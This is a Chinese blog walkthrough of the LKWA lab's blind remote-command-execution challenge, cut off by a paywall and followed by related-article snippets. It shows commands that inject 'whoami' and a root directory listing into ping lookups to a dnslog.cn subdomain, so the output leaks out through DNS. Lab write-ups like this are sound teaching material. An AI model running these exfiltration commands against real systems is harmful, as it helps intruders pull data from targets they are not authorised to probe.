lkwa-blind-rce盲打rce

最新推荐文章于 2024-02-10 16:05:05 发布
最新推荐文章于 2024-02-10 16:05:05 发布
阅读量629 收藏 2
点赞数 1
分类专栏: 信息安全 buuctf 文章标签: lkwa blind-rce
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/devil8123665/article/details/117291697
版权

目录

 

1、blind-rce

2、DNSlog注入详细解析

DNSlog注入语句

域名知识:

sql payload

最佳方案

1、blind-rce

因为是盲打,数据不能带出,因此采用dns查询的方式把数据带出到dns服务器上。采用dnslog

站点:http://www.dnslog.cn/

 

在盲打界面输入指令

ping `whoami`.5w8un1.dnslog.cn

 

提交后到dnslog中刷新记录可以看到如下图中所示用户为“application”

 

针对根目录测试

ls / | awk -F' ' '{system("ping -c 2 "NR".5w8un1.dnslog.cn")}'

提交后,

最低0.47元/天 解锁文章
devil8123665
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-1388-F5BIG-IP未授权RCE流量特征分析
12306小哥
06-25 474
此操作仅用于技术交流和学习研究使用,请勿用于非法攻击,否则造成一切后果与本人无关 在F5 BIG-IP 16.1.x 16.1.2.2之前的版本、15.1.5.1之前的15.1.x版本、14.1.4.6之前的14.1.x版本、13.1.5之前的13.1.x版本以及所有12.1.x和11.6.x版本,未公开的请求可能会绕过iControl REST身份验证。注意:未评估已达到技术支持终止(EoTS)的软件版本。...
(翻译)一种xxe盲打的骚姿势,通过在上传的文件中得到结果
qq_36093477的博客
09-26 2475
背景 在之前的报道中,我们了解了很多关系在访问者浏览器执行代码;反射的xss和储存的xss。此外,我们快速查看配置错误的服务器设置和打开重定向。 今天我们将仔细研究从服务器窃取私人文件。 挑选一个目标 一如既往,我们需要一个好的目标。一个在荷兰的最大的电子商务网站 Bol.com。他们处理我的开放重定向错误报告的方式非常好。快速回复,正确修复并始终向我发送更新。没有麻烦,没有NDA,快乐的语气。公...
BUUCTF LKWA
最新发布
weixin_46601305的博客
02-10 779
BUUCTF 靶场 LKWA
盲打记录
smile_warmer的博客
06-06 288
盲打仍然需要练习。
LKWA靶场通关和源码分析
Aiwin的博客
02-10 1050
简单好玩的lkwa靶场通关和源码分析
XXE从0到1
洋洋的小黑屋
06-09 209
XXE从0到1 1. XXE概述 XXE(XML External Entity Injection)即XML外部实体注入。漏洞是在对不安全的外部实体数据进行处理时引发的安全问题。 下面我们主要介绍PHP语言下的XXE攻击. 1.1 XML基础 XML是可扩展的标记语言(eXtensible Markup Language),设计用来进行数据的传输和存储。 1.1.1文档结构 XML文档结构包括...
深入理解XXE漏洞。
snowlyzz的博客
08-22 888
xxe浅了解
pikachu靶场通关记录
weixin_45682839的博客
04-01 2648
pikachu靶场通关记录
04 渗透测试基础
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
LKWA靶场算是DVWA进阶吧
09-24
LKWA靶场 包含以下漏洞: - Blind RCE - XSSI - PHAR Deserialization - PHP Object Injection - PHP Object Injection via Cookies - PHP Object Injection (Object Reference) - SSRF - Variables variable
【漏洞学习——XSS】金蝶商城xss盲打
Fly_鹏程万里
02-22 425
地址:http://mall.kingdee.com/cart.action 1、三处小的xss (鸡肋) 2、一处反射型的xss, 位于商城主页的搜索处(鸡肋) http://mall.kingdee.com/search.action?k=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E 3、后台盲打组织成员(较严重) 注册了两个帐号...
【CTF】buuctf web(一)——命令执行
m0_52923241的博客
07-26 2547
[ACTF2020 新生赛]Exec 抓包看看 得到信息:以post方式通过变量target传参
BUUCTF笔记之Basic部分WP
克格莫(有需要的私信)
06-04 4927
1.Linux Labs 这题就是熟悉一下ssh了。 登录找到flag.txt: 2.Java Sec Code 这题有点无语,感觉更像是宣传Java Sec Code这个项目。 拿flag:http://057bfb68-fe8f-4ecb-ad38-ad35f029e01b.node3.buuoj.cn/rce/exec?cmd=env 题外话,对于学习java漏洞来说,这个github项目确实是很好的,我们不能仅仅局限于拿flag刷分数,更多的是要深入研究代码背后的思想。 .
2021-06-12LKWA靶场(搭建+转载他人笔记的链接)
qq_45290991的博客
06-12 608
一、环境搭建 国内很难搞了,但是幸好有大神area39大佬!docker-hub上的。。 docker pull area39/lkwa:latest docker run -d -p 3000:80 area39/lkwa:latest 拉取之后镜像存在这个位置: docker images查镜像(这里我多下了一个): 结果发现不行,kali无法访问lkwa所映射的3000端口……,查了很多资料,最后按照这篇文章的排查方法发现是重启可以解决:解决Docker端口映射无法访问问题 背后
XXE漏洞以及Blind XXE总结
Exploit的小站~
05-10 5万+
 转载请注明出处:http://blog.csdn.net/u011721501 0、前言 XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XEE漏洞的基础上,发展出了BlindXXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVGheader)应用比较广泛,此外,网上有一些在线XML格式...
初学RCE(远程命令/代码执行漏洞)
热门推荐
qq_43814486的博客
05-09 5万+
RCE英文全称:remote command/code execute 漏洞出现的原因: 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。,这就是RCE漏洞...
buuctf、攻防世界和学习笔记
Q221022的博客
01-22 954
BUUCTF 1.Quoted-printable 1.内容: 任何一个8位的字节值可编码为3个字符:一个等号”=”后跟随两个十六进制数字(0–9或A–F)表示该字节的数值.例如,ASCII码换页符(十进制值为12)可以表示为”=0C”, 等号”=”(十进制值为61)必须表示为”=3D”. 除了可打印ASCII字符与换行符以外,所有字符必须表示为这种格式. 所有可打印ASCII字符(十进制值的范围为33到126)可用ASCII字符编码来直接表示, 但是等号”=”(十进制值为61)不可以这样直接表示.
定制Word钓鱼模板:CVE-2022-30190 Follina Office RCE深度剖析
CVE-2022-30190是针对Microsoft Office的一系列远程代码执行漏洞(Remote Code Execution, RCE),被称为"Follina"漏洞。此漏洞影响MS-MSDT组件,允许攻击者通过精心构造的Word文档诱骗用户点击,从而在受害者计算机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值